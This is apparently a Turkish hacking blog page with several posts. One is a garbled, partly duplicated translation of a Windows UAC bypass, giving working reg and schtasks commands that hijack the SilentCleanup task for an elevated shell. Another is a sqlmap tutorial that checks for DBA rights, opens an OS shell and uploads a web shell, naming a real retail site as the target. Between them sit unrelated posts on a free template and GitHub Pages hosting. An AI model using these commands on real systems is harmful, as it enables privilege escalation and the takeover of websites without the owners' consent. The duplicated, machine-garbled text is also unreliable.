7 Eylül 2019 Cumartesi

UAC Bypass w/ Exploiting Scheduled Tasks

Windows Görev Zamanlayıcı, ayrıcalıklı yükselişler bulmak ve bulmak için harika bir yerdir, tipik olarak Windows‘a SUID stili yetenekleri yanlış anlaşılması kolay bir pakette eklemek kötüye kullanılır. Programları LocalSystem olarak çalıştırabilir, UAC için uygulamaları otomatik olarak kaldırabilir, hatta isteğe bağlı COM nesnelerini barındırabilir. Sonuç olarak bu bir karışıklıktır, bu yüzden programlayıcıda veya görevlerde hata bulmak özellikle zor değildir. Örneğin burada var birkaç Ben ettik bulundu önce . Bu kısa blog, UAC ile sessizce çalışan, en yüksek bilgi istemi seviyesine ayarlanmış ve herhangi bir dosyayı (bir kayıt defteri anahtarının dışında) diske bırakmadan çalıştırılabileceğini keşfeden hızlı ve kirli bir UAC bypass‘ı hakkında.

Her neyse, teknik olarak Microsoft ürünlerinde hata bulmak (bu yüzden neden olmasın diye sormaktan kaçınmak) konusunda sabote ediyorum. Ancak bazen ben bakmıyorken size sadece bir böcek üzerinde gezi tür. Çeşitli zamanlanmış görevlerin etrafında duruyordum ve ilginç görünen birinin, SilentCleanup olduğunu fark ettim . Bunun ilginç olmasının otomatik yükseltme olarak işaretlenmiş olması (bu durumda arayan kişi bölünmüş bir yönetici ise sessizce UAC yöneticisi olarak çalıştırılacak) ve yönetici olmayan kullanıcı tarafından manuel olarak başlatılabilir.

Anlaşılan bu ilginç olduğunu farketmeden yalnız değilim, Matt Nelson zaten bu zamanlanmış görevde bir UAC atlaması buldu. fakat tespit edilebildiği kadarıyla zaten düzeltildi, yani hala onu kullanmanın bir yolu var mı? Görmek için Powershell‘i kullanarak görevin özelliklerinden bazılarını bırakalım.
Windows Görev Zamanlayıcı, ayrıcalıklı yükselişler bulmak ve bulmak için harika bir yerdir, tipik olarak Windows‘a SUID stili yetenekleri yanlış anlaşılması kolay bir pakette eklemek kötüye kullanılır. Programları LocalSystem olarak çalıştırabilir, UAC için uygulamaları otomatik olarak kaldırabilir, hatta isteğe bağlı COM nesnelerini barındırabilir. Sonuç olarak bu bir karışıklıktır, bu yüzden programlayıcıda veya görevlerde hata bulmak özellikle zor değildir. Örneğin burada var birkaç Ben ettik bulundu önce . Bu kısa blog, UAC ile sessizce çalışan, en yüksek bilgi istemi seviyesine ayarlanmış ve herhangi bir dosyayı (bir kayıt defteri anahtarının dışında) diske bırakmadan çalıştırılabileceğini keşfeden hızlı ve kirli bir UAC bypass‘ı hakkında.

Her neyse, teknik olarak Microsoft ürünlerinde hata bulmak (bu yüzden neden olmasın diye sormaktan kaçınmak) konusunda sabote ediyorum. Ancak bazen ben bakmıyorken size sadece bir böcek üzerinde gezi tür. Çeşitli zamanlanmış görevlerin etrafında duruyordum ve ilginç görünen birinin, SilentCleanup olduğunu fark ettim . Bunun ilginç olmasının otomatik yükseltme olarak işaretlenmiş olması (bu durumda arayan kişi bölünmüş bir yönetici ise sessizce UAC yöneticisi olarak çalıştırılacak) ve yönetici olmayan kullanıcı tarafından manuel olarak başlatılabilir.

Anlaşılan bu ilginç olduğunu farketmeden yalnız değilim, Matt Nelson zaten bu zamanlanmış görevde bir UAC atlaması buldu. fakat tespit edilebildiği kadarıyla zaten düzeltildi, yani hala onu kullanmanın bir yolu var mı? Görmek için Powershell‘i kullanarak görevin özelliklerinden bazılarını bırakalım.



Gelen Principal mülkiyet görebildiğimiz Grup olarak çalışacak şekilde Kullanıcılar Kimliği doğrulanmış gerçekten bir işe başlama oturum açan kullanıcı ile çalışacak anlamına gelir. Ayrıca RunLevel‘in En yükseğe ayarlanmış olduğunu görüyoruz.bu, Görev Zamanlayıcı‘nın görevi istemeden yöneticiye yükseltmeye çalışacağını gösterir. Şimdi eylemlere bakın, bir yol belirtiyor, ancak ilginç bir şey fark ediyor musunuz? Yolun bir parçası olarak bir ortam değişkeni kullanıyor ve UAC senaryolarında bunlar normal bir kullanıcı tarafından HKEY_CURRENT_USER \\ Enviroment kayıt defteri anahtarına yazılarak ve bir REG_SZ değeri belirtilerek etkilenebilir .

Bu yüzden çalıları çalmayı kes, haydi onu kullanmaya çalışalım. C: \\ dummy \\ system32 \\ cleanmgr.exe dosyasına basit bir çalıştırılabilir dosya bıraktım , windir ortam değişkenini c: \\ dummy olarak ayarlayınve zamanlanmış göreve başladım hemen yönetici ayrıcalıklarına sahibim. Öyleyse süreci otomatikleştirelim, ihtiyacımız olan tüm işi yapmak için reg ve schtasks komutlarını kullanabildiğimiz için herkesin favori dilini BATCH kullanacağım . Ayrıca bir dosyayı diske bırakmak istemediğimizden, yürütülebilir yolun Görev Zamanlayıcısı tarafından alıntılanmadığı gerçeğini kötüye kullanabiliriz, bu da isteğe bağlı komut satırı argümanlarını enjekte edebileceğimiz ve sadece basit bir CMD kabuğu çalıştırabiliriz.

Quote:
reg add hkcu\\Environment /v windir /d "cmd /K reg delete hkcu\\Environment /v windir /f REM "
schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I




BATCH dosyası ilk önce windir ortam değişkenini "cmd / K" olarak ayarlar, ardından orijinal windir ortam değişkenini silen aşağıdaki komut dosyası ile satırın geri kalan kısmını yorumlamak için REM kullanır. Bunu Windows 10 Anniversary Edition ve daha üst sürümlerinde split jeton yöneticisi olarak kullanmak, yönetici olarak çalışan bir mermi elde etmenizi sağlar. Daha önceki Windows sürümlerinde test etmedim, bu yüzden YMMV. Bunu MSRC‘ye göndermedim, ancak bir arkadaşım aracılığıyla RS3‘ün gelecek bir sürümünde zaten düzeltilmesi gerektiğini doğruladı, bu yüzden MS, en azından olabildiğince UAC‘yi geri kilitlemeye çalışmak konusunda ciddi görünüyor. .

Quote:
$action = New-ScheduledTaskAction -Execute $env:windir\\System32\\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
Set-ScheduledTask SilentCleanup -TaskPath \\Microsoft\\Windows\\DiskCleanup -Action $action



Başka potansiyel adaylar bulmak istiyorsanız, aşağıdaki Powershell betiği
, otomatik olarak yükselten yürütülebilir eylemlerle tüm görevleri bulacaktır. Sistemimde 4 ayrı görev var, ancak yalnızca bir kişi ( SilentCleanup görevi) normal bir kullanıcı olarak yürütülebiliyor, bu yüzden gerisi sömürülemez. Sanırım iyi bir şey.

6 Eylül 2019 Cuma

Violin Dark - Portfolio HTML5/CSS3 Template Free

$17 dolarlık html5 scripti ücretsiz paylaşıyorum
güle güle kullanırsınız
Demo; Demoya gitmek için Tıkla
İndirme Linki; İndirme Linkine Gitmek İçin Tıkla
Orcun Root'a Teşekkürler 

4 Eylül 2019 Çarşamba

Github'ta Site Barındırmak

{ Merhaba arkadaşlar Github üzerinde nasıl site barındırılır ? Ücretsiz midir ?
Sorularına cevap verelim, Öncelikle ücretsiz bir servis sunmaktadır arkadaşlar.
Peki Github Pages dediğimiz bu hizmeti kullanmak için ne yapmak gerekiyor.
Github hesabımıza giriş yaptıktan sonra New repository diyoruz 
Gerekli alanları dolduruyoruz "Initialize this repository with a README " tikini işaretliyoruz 
Sonra settings bölümünden -> 
Resimde görmüş olduğunuz "master branch" alanını seçiyoruz.
böylece {kullanici.adi}.github.io şeklinde çalışma alanımız aktif hale geliyor.
Projeyi istediğimiz gibi yapılandırabiliriz. 
( Kendi alan adımızada bağlayabiliriz )
Yani DNS yönetiminden 2 adet A kaydı eklemek gerekiyor şu şekilde;
rootayyıldız.com – 192.31.252.153
rootayyıldız.com – 192.31.252.154
Bu işlemden sonra  Github çalışma alanımıza dönerek yeni bir dosya oluşturuyoruz.
Dosyanın adına CNAME yazıyoruz. İçeriğine ise kendi alan adımızı yazıyoruz.
yani yukarıdaki ayarsecurity.com ismini yazmamız yeterli.
Artık “kullaniciadi.github.io” şeklinde değilde www.domain.com şeklinde olacak.
Artık HTMLCSS ve JavaScript dosyalarınızı oluşturduğunuz çalışma alanına ekleyebilirsiniz.
Hatta Jekyll dediğimiz Ruby alt yapısıyla oluşturulmuş bir araç var
Yani basit bir blog sistemi oluşturmaya yarıyor, Kurulumu burada anlatılmış.
Jekyll' yapısında  -> WP-Blogger gibi bloglara import desteğide sunuyor.
Github jekyll kurulumu ile ilgili daha detaylı bilgi ve beceri kazanmak isterseniz.
Youtube'ta bu link < üzerinden videoları izleyebilirsiniz.
Haydin görüşmek üzere. }

3 Eylül 2019 Salı

Sqlmap Shell Upload



Öncelikle Sql açıklı sitemizi buluyoruz
ve sitemizde bir sqlmap sorgusu başlatıyoruz.Fakat bu sorgu diğerlerinden
farklı oluyor.


Bu sefer --dbs komutu yerine --current-user --is-dba komutunu gireceğiz.

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --dbs
yerine

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --current-user --is-dba
komutu ile ancak Sorgulamayı başlatabiliriz. Biraz bekledikten sonra eğer şöyle birşey görürseniz.


Kod:
current user is DBA : True 

Bilinizki shell sokmaya çok yakınsınız.Peki şimdi ne yapacağız?

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --os-shel
Yapıyoruz ve karşımıza sitenin yazılmış olduğu dili soruyor.Bu dili şu yolla bulabiliriz. 

Mesela sitemiz şu

Kod:
https://www.diapers.com/ 
bu siteye girdim ve .comdan sonra şunu denedim

Kod:
https://www.diapers.com/index.php
Pagenotfound hatası aldım demekki php ile yazılmamış.Daha sonra şunu denedim

Kod:
https://www.diapers.com/index.asp
Gene Pagenotfound hatası aldım demekki asp ile de yazılmamış.Fakat şunu denediğimde

Kod:
https://www.diapers.com/index.aspx 
Ana sayfasına ulaştım yani sayfa aspx dili ile yazılmış.Sqlmap size şöyle
seçenekler verir.

|1|ASP
|2|ASPX
|3|PHP
|4|JSP

bu durumda Sayfamızın dilini yani aspx'i işaretledik.Hedef sitemiz diapers.com çünkü.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte (.php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp)


enterlamanız yeterli örnek:

Kod:
www.hedefsite.com/events/supercali/tmpuhvef.php
de upload ediyoruz mesela shellimin adı k2.php olsun

Kod:
www.hedefsite.com/events/supercali/k2.php